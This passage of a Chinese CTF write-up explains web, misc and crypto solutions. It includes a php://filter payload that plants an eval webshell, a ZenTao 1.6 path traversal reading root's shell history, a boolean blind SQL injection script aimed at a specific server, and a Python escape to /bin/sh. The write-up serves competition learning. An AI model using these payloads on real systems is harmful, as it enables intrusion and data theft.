class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-variable">$filename</span>=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'filename'</span>];<br><span class="hljs-variable">$res</span>=[<span class="hljs-string">"hacker"</span>=><span class="hljs-variable">$_GET</span>[<span class="hljs-string">'cmd'</span>]];<br><span class="hljs-variable">$code</span> = <span class="hljs-string">'<?php return ['</span>;<br><span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$res</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$key</span> => <span class="hljs-variable">$value</span>)<br>{<br><span class="hljs-variable">$code</span> .= <span class="hljs-string">'\''</span> . <span class="hljs-variable">$key</span> . <span class="hljs-string">'\''</span> . <span class="hljs-string">'=>'</span> . <span class="hljs-string">'\''</span> . <span class="hljs-variable">$value</span> . <span class="hljs-string">'\''</span> . <span class="hljs-string">','</span>;<br>}<br><span class="hljs-variable">$code</span> .= <span class="hljs-string">']; '</span>;<br><span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$filename</span>,<span class="hljs-variable">$code</span>);<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>考点明确,<code>php://filter</code>的使用 这里的问题在于我们写入的文件会作为<code>return</code>后面的内容,无法实现任意代码执行。就要想办法跳出来,此处相当于绕过死亡函数,单纯使用<code>write=convert.base64-decode</code>会因为<code>=</code>的存在不能成功, 所以最后使用<code>write=string.strip_tags|convert.base64-decode</code>,并且传参要闭合<code>return</code>。payload:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php">GET:<br>cmd=];<span class="hljs-meta">?></span>PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz5h <span class="hljs-comment">//<?php</span><br>@<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'cmd'</span>]);<span class="hljs-meta">?></span>a<br>POST:<br>filename=php:<span class="hljs-comment">//filter/write=string.strip_tags|convert.base64-</span><br>decode/resource=a.php<br></code></pre></td></tr></table></figure><p>蚁剑链接<code>a.php</code>,找到根目录下的flag。</p><h4 id="足迹"><a href="#足迹" class="headerlink" title="足迹"></a>足迹</h4><p>根据题目提示,搜索禅知1.6历史漏洞,发现前台任意文件读取,访问如下可实现任意文件读取:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span><span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><span class="hljs-regexp">/file.php?pathname=../i</span>ndex.php&t=txt&o=source<br></code></pre></td></tr></table></figure><p>看首页给的提示:</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag"><<span class="hljs-name">h2</span>></span>这该死的黑客为了拿到flag,把环境破环成这个鬼样子啦。<span class="hljs-tag"></<span class="hljs-name">h2</span>></span><br><span class="hljs-tag"><<span class="hljs-name">h2</span>></span>这个黑客以root身份进入到了服务器拿到了flag<span class="hljs-tag"></<span class="hljs-name">h2</span>></span><br><span class="hljs-tag"><<span class="hljs-name">h2</span>></span>奥对了,听说这个版本是禅知1.6哦<span class="hljs-tag"></<span class="hljs-name">h2</span>></span><br></code></pre></td></tr></table></figure><p>结合题目名称”足迹“,推测要读取日志类型的文件。</p><p>比赛时没做出来,赛后出题人说要看记录了执行过的命令的文件;到这里才清楚要包含的方向,比赛时包含的是各种日志来看踪迹,但是要么没有关系,要么出题人基本都删了(留了最后的<code>Shell</code>历史命令 记录文件);这里要读取<code>root</code>用户的<code>Shell</code>历史命令文件:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span><span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><span class="hljs-regexp">/file.php?pathname=../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>root/.bash_history&t=txt&o=source<br></code></pre></td></tr></table></figure><p>在记录中,可以看到这段信息:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#1630747485</span><br>find / -name flag<br><span class="hljs-comment">#1630747488</span><br>clear<br><span class="hljs-comment">#1630747490</span><br><span class="hljs-built_in">cd</span> /<br><span class="hljs-comment">#1630747491</span><br><span class="hljs-built_in">ls</span><br><span class="hljs-comment">#1630747495</span><br><span class="hljs-built_in">cat</span> flllllllllllllllll1ag<br></code></pre></td></tr></table></figure><p>所以用以下payload读取flag:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span><span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><span class="hljs-regexp">/file.php?pathname=../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>flllllllllllllllll1ag&t=txt&o=source<br></code></pre></td></tr></table></figure><h4 id="WUST颜值查询2-0"><a href="#WUST颜值查询2-0" class="headerlink" title="WUST颜值查询2.0"></a>WUST颜值查询2.0</h4><p>过滤了<code>"</code>,<code>'</code>,<code>, </code>,<code>=</code>,<code>空格</code>,<code>if</code>,<code>like</code>,<code>regexp</code>,<code>--+</code>,<code>sleep</code> ,<code>benchmark</code> ,<code>join</code>这个注入的语句很奇怪,不太懂后台原理(不会开发T^T),之后要和出题人”聊一聊“ 起手测试类型:<code>id=1</code>没有爆错,字母报错,为数字型;这里偶然测试了<code>id=database()</code>发现回显了欢 迎信息(做到后面就会发现在<code>id=0,4,5</code>时有欢迎信息),说明为盲注型。</p><p>目前我所知的范围内,时间盲注无法使用,考虑布尔盲注,构造如下测试语句,页面回显欢迎信息:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">case</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">when</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">then</span><span class="hljs-comment">/**/</span>database()<span class="hljs-comment">/**/</span><span class="hljs-keyword">else</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">end</span>)<br></code></pre></td></tr></table></figure><p>爆出当前数据库名,下为测试语句,回显欢迎信息;脚本跑出当前数据库名<code>test</code>:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">case</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">when</span><span class="hljs-comment">/**/</span>(ascii(substr(database()<span class="hljs-comment">/**/</span><span class="hljs-keyword">from</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">for</span><span class="hljs-comment">/**/</span><br><span class="hljs-number">1</span>))<span class="hljs-operator">></span><span class="hljs-number">1</span>)<span class="hljs-comment">/**/</span><span class="hljs-keyword">then</span><span class="hljs-comment">/**/</span>database()<span class="hljs-comment">/**/</span><span class="hljs-keyword">else</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">end</span>)<br></code></pre></td></tr></table></figure><p>爆所有数据库名,下为测试语句,回显欢迎信息;跑出数据库 <code>information_schema</code>,<code>mysql</code>,<code>performance_schema</code>,<code>sys</code>,<code>test</code>:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">case</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">when</span><span class="hljs-comment">/**/</span>(ascii(substr((<span class="hljs-keyword">select</span>(group_concat(schema_name))<br><span class="hljs-keyword">from</span>(information_schema.schemata))<span class="hljs-comment">/**/</span><span class="hljs-keyword">from</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">for</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span>))<span class="hljs-operator">></span><span class="hljs-number">1</span>)<span class="hljs-comment">/**/</span><span class="hljs-keyword">then</span><span class="hljs-comment">/**/</span>data<br>base()<span class="hljs-comment">/**/</span><span class="hljs-keyword">else</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">end</span>)<br></code></pre></td></tr></table></figure><p>爆出<code>test</code>库的表名,下为测试语句;跑出<code>ctf</code>,<code>flaaaaag</code>:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql">(<span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">case</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">when</span><span class="hljs-comment">/**/</span>(ascii(substr((<span class="hljs-keyword">select</span>(group_concat(table_name))f<br>rom(information_schema.tables)<span class="hljs-comment">/**/</span><span class="hljs-keyword">where</span><span class="hljs-comment">/**/</span>table_schema<span class="hljs-comment">/**/</span><span class="hljs-keyword">in</span><span class="hljs-comment">/**/</span>(<span class="hljs-keyword">select</span><span class="hljs-comment">/**/</span>data<br>base()))<span class="hljs-comment">/**/</span><span class="hljs-keyword">from</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">for</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span>))<span class="hljs-operator">></span><span class="hljs-number">1</span>)<span class="hljs-comment">/**/</span><span class="hljs-keyword">then</span><span class="hljs-comment">/**/</span>database()<span class="hljs-comment">/**/</span><span class="hljs-keyword">else</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">end</span><br>)<br></code></pre></td></tr></table></figure><p>卡在爆列名上。最后手动测试(猜)出<code>ctf</code>表的两个列名<code> id</code>,<code>name</code>;<code>flaaaaag</code>表的一个列名<code>id</code>。</p><p>经过一番思索,找出了可用于筛选的<code>where</code>条件:</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">where</span><span class="hljs-comment">/**/</span>ascii(substr(table_name<span class="hljs-comment">/**/</span><span class="hljs-keyword">from</span><span class="hljs-comment">/**/</span><span class="hljs-number">8</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">for</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span>))<span class="hljs-operator">></span><span class="hljs-number">102</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">and</span><span class="hljs-comment">/**/</span>ascii(<br>substr(table_name<span class="hljs-comment">/**/</span><span class="hljs-keyword">from</span><span class="hljs-comment">/**/</span><span class="hljs-number">8</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">for</span><span class="hljs-comment">/**/</span><span class="hljs-number">1</span>))<span class="hljs-operator"><</span><span class="hljs-number">104</span><br></code></pre></td></tr></table></figure><p>含义为限定寻找字段 table_name 中,值第8位字符的ASCII介于102到104之间的数据,通过此种方法, 减小查询范围。下面放出脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#这用于简单的get传参bool盲注</span><br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> time<br><br>url = <span class="hljs-string">"http://118.31.32.88:8095/?"</span><br>temp = {<span class="hljs-string">"id"</span> : <span class="hljs-string">""</span>}<br>column = <span class="hljs-string">""</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">1100</span>):<br> time.sleep(<span class="hljs-number">0.03</span>)<br> low = <span class="hljs-number">32</span><br> high =<span class="hljs-number">128</span><br> mid = (low+high)//<span class="hljs-number">2</span><br> <span class="hljs-keyword">while</span>(low<high):<br> <span class="hljs-comment">#爆当前库名</span><br> temp[<span class="hljs-string">"id"</span>] = <span class="hljs-string">"(select/**/case/**/1/**/when/**/(ascii(substr((select/**/database())/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)"</span> %(i,mid)<br> <span class="hljs-comment">#爆所有库名</span><br> <span class="hljs-comment">#temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata))/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)</span><br> <span class="hljs-comment">#爆表名</span><br> <span class="hljs-comment">#temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(table_name))from(information_schema.tables)/**/where/**/table_schema/**/in/**/(select/**/database()))/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)</span><br> <span class="hljs-comment">#爆字段</span><br> <span class="hljs-comment">#temp["id"] = "(select/**/case/**/1/**/when/**/(ascii(substr((select(group_concat(column_name))from(information_schema.columns)/**/where/**/ascii(substr(table_name/**/from/**/8/**/for/**/1))>102/**/and/**/ascii(substr(table_name/**/from/**/8/**/for/**/1))<104)/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)</span><br> <span class="hljs-comment">#爆值</span><br> <span class="hljs-comment">#temp["id"] = "(select/**/case/**/when/**/(ascii(substr((select/**/group_concat(f1ag)from/**/`flaaaaag`)/**/from/**/%d/**/for/**/1))>%d)/**/then/**/database()/**/else/**/1/**/end)" %(i,mid)</span><br> r = requests.get(url,params=temp)<br> <span class="hljs-comment">#time.sleep(0.05)</span><br> <span class="hljs-comment">#print(low,high,mid,":")</span><br> <span class="hljs-keyword">if</span> <span class="hljs-string">"hello"</span> <span class="hljs-keyword">in</span> r.text:<br> low = mid+<span class="hljs-number">1</span><br> <span class="hljs-keyword">else</span>:<br> high = mid<br> mid =(low+high)//<span class="hljs-number">2</span><br> <span class="hljs-keyword">if</span>(mid ==<span class="hljs-number">32</span> <span class="hljs-keyword">or</span> mid ==<span class="hljs-number">127</span>):<br> <span class="hljs-keyword">break</span><br> column +=<span class="hljs-built_in">chr</span>(mid)<br> <span class="hljs-built_in">print</span>(column)<br> <br><span class="hljs-built_in">print</span>(<span class="hljs-string">"All:"</span> ,column)<br></code></pre></td></tr></table></figure><h3 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h3><h4 id="signin"><a href="#signin" class="headerlink" title="signin"></a>signin</h4><p>零宽度字符隐写+emoji-aes。</p><h4 id="py2"><a href="#py2" class="headerlink" title="py2"></a>py2</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-built_in">__import__</span>(<span class="hljs-string">'os'</span>).system(<span class="hljs-string">'/bin/sh'</span>)<br></code></pre></td></tr></table></figure><h4 id="ezsteg"><a href="#ezsteg" class="headerlink" title="ezsteg"></a>ezsteg</h4><p>用stegsolve打开图片,在red plane 0通道发现G plane通道有东西。 保存Green plane 0的图片然后用<code>stegsolve</code>的Image Combiner功能进行对比。 发现了前⼀半flag还有后⼀半flag的提示是用QIM量化,步长为20。在github搜索QIM quantization搜到这个网址:<a href="https://github.com/pl561/QuantizationIndexModulation/blob/master/qim.py%E3%80%82%E4%BB%BF%E7%85%A7%E9%87%8C%E9%9D%A2%E7%9A%84%60test_qim%60%E8%BF%9B%E8%A1%8C%E5%87%BD%E6%95%B0%E9%87%8D%E5%86%99%EF%BC%8C%E5%8F%91%E7%8E%B0%E7%BB%93%E6%9E%9C%E9%87%8C%E7%9A%84msg_detected%E5%85%A8%E6%98%AF1%E5%92%8C0%EF%BC%8C%E6%8A%8A%E6%89%80%E6%9C%89%E7%9A%840%E9%83%BD%E6%94%B9%E6%88%90255%EF%BC%8C%E5%86%8D%E4%BF%9D%E5%AD%98%E6%88%90%E6%96%B0%E7%9A%84%E5%9B%BE%E7%89%87%EF%BC%8C%E5%BE%97%E5%88%B0%E5%90%8E%E4%B8%80%E5%8D%8Aflag%E3%80%82">https://github.com/pl561/QuantizationIndexModulation/blob/master/qim.py。仿照里面的`test_qim`进行函数重写,发现结果里的msg_detected全是1和0,把所有的0都改成255,再保存成新的图片,得到后一半flag。</a></p><p>脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">my_test_qim</span>():<br> delta = <span class="hljs-number">20</span><br> qim = QIM(delta)<br> y = cv2.imread(<span class="hljs-string">'./ezsteg.png'</span>)<br> z_detected, msg_detected = qim.detect(y)<br> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> tqdm(<span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(msg_detected))):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(msg_detected[i])):<br> <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(msg_detected[i][j])):<br> <span class="hljs-keyword">if</span> msg_detected[i][j][k] == <span class="hljs-number">1</span>:<br> msg_detected[i][j][k] = <span class="hljs-number">255</span><br> cv2.imwrite(<span class="hljs-string">'flag.png'</span>, msg_detected)<br></code></pre></td></tr></table></figure><h4 id="babypcap"><a href="#babypcap" class="headerlink" title="babypcap"></a>babypcap</h4><p>鼠标流量题,CSDN能搜到脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># f=open('usbdata.txt','r')</span><br><span class="hljs-comment"># fi=open('out.txt','w')</span><br><span class="hljs-comment"># while 1:</span><br><span class="hljs-comment"># a=f.readline().strip()</span><br><span class="hljs-comment"># if a:</span><br><span class="hljs-comment"># if len(a)==8: # ⿏标流量的话len改为8</span><br><span class="hljs-comment"># out=''</span><br><span class="hljs-comment"># for i in range(0,len(a),2):</span><br><span class="hljs-comment"># if i+2 != len(a):</span><br><span class="hljs-comment"># out+=a[i]+a[i+1]+":"</span><br><span class="hljs-comment"># else:</span><br><span class="hljs-comment"># out+=a[i]+a[i+1]</span><br><span class="hljs-comment"># fi.write(out)</span><br><span class="hljs-comment"># fi.write('\n')</span><br><span class="hljs-comment"># else:</span><br><span class="hljs-comment"># break</span><br><span class="hljs-comment"># fi.close()</span><br><br>nums = []<br>keys = <span class="hljs-built_in">open</span>(<span class="hljs-string">'out.txt'</span>,<span class="hljs-string">'r'</span>)<br>f = <span class="hljs-built_in">open</span>(<span class="hljs-string">'xy.txt'</span>,<span class="hljs-string">'w'</span>)<br>posx = <span class="hljs-number">0</span><br>posy = <span class="hljs-number">0</span><br><span class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> keys:<br><span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(line) != <span class="hljs-number">12</span> :<br><span class="hljs-keyword">continue</span><br> x = <span class="hljs-built_in">int</span>(line[<span class="hljs-number">3</span>:<span class="hljs-number">5</span>],<span class="hljs-number">16</span>)<br> y = <span class="hljs-built_in">int</span>(line[<span class="hljs-number">6</span>:<span class="hljs-number">8</span>],<span class="hljs-number">16</span>)<br> <span class="hljs-keyword">if</span> x > <span class="hljs-number">127</span> :<br> x -= <span class="hljs-number">256</span><br> <span class="hljs-keyword">if</span> y > <span class="hljs-number">127</span> :<br> y -= <span class="hljs-number">256</span><br> posx += x<br> posy += y<br>btn_flag = <span class="hljs-built_in">int</span>(line[<span class="hljs-number">0</span>:<span class="hljs-number">2</span>],<span class="hljs-number">16</span>) <span class="hljs-comment"># 1 for left , 2 for right , 0 for nothing</span><br> <span class="hljs-keyword">if</span> btn_flag == <span class="hljs-number">2</span> : <span class="hljs-comment"># 1 代表左键</span><br> f.write(<span class="hljs-built_in">str</span>(posx))<br> f.write(<span class="hljs-string">' '</span>)<br> f.write(<span class="hljs-built_in">str</span>(posy))<br> f.write(<span class="hljs-string">'\n'</span>)<br>f.close()<br></code></pre></td></tr></table></figure><h4 id="forensic"><a href="#forensic" class="headerlink" title="forensic"></a>forensic</h4><p>Volatility hashdump</p><h3 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h3><h4 id="checkin"><a href="#checkin" class="headerlink" title="checkin"></a>checkin</h4><p>签到题,直接上脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><br>a =<br><span class="hljs-number">9631670005361998234982649808225984489506338024056702200592851391520</span><br><span class="hljs-number">4024844540469555622671378420860794984950658042831492783861955562369</span><br><span class="hljs-number">1571514215161194613947761984811384149579480986395179616923334686396</span><br><span class="hljs-number">1464392950546233697674024508779088135862120191099869255630921864806</span><br><span class="hljs-number">1409226131514631759925556900619868423867</span><br>p =<br><span class="hljs-number">1772397479946330723163700367177958503809469527323645748555263786917</span><br><span class="hljs-number">7494640588817688783672929857654918650734584203142823924210712356092</span><br><span class="hljs-number">7684315092976659481316206341152868428190256155821018749939785354467</span><br><span class="hljs-number">6112482960429296616190152426855278860415557236374173007912427682616</span><br><span class="hljs-number">81522882474858447747878003388616705422171</span><br>c =<br><span class="hljs-number">3124981003034002486770151625321612487379837376292128516032667813037</span><br><span class="hljs-number">3368708545564162489355490838932695325242212478465783024384459580684</span><br><span class="hljs-number">9256422812022701898553861587130501162228906094036586640090856008471</span><br><span class="hljs-number">9498962523321776520567037375918102170844317963453709006654697325297</span><br><span class="hljs-number">2859914381008999790882607671941093099299</span><br>ni = invert(a, p)<br>m = c * ni % p<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(m)))<br></code></pre></td></tr></table></figure><p>P.S.以下题目都只有脚本!</p><h4 id="base"><a href="#base" class="headerlink" title="base"></a>base</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python">s = <span class="hljs-string">'zCN7zTIOntz8zCiPzsQQzCySltr8m9mJyCiMmsQMmPmRzwyPzdfBowzZ='</span><br>b_char =<br><span class="hljs-string">'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/'</span><br>b = <span class="hljs-string">''</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> s:<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(b_char)):<br> <span class="hljs-keyword">if</span> i == b_char[j]:<br> b += <span class="hljs-built_in">str</span>(<span class="hljs-built_in">bin</span>(j)).replace(<span class="hljs-string">'0b'</span>, <span class="hljs-string">''</span>).zfill(<span class="hljs-number">6</span>)<br>flag = <span class="hljs-string">''</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(b), <span class="hljs-number">8</span>):<br> flag += <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(b[i: i+<span class="hljs-number">8</span>], <span class="hljs-number">2</span>))<br><span class="hljs-built_in">print</span>(flag)<br></code></pre></td></tr></table></figure><h4 id="random1"><a href="#random1" class="headerlink" title="random1"></a>random1</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span 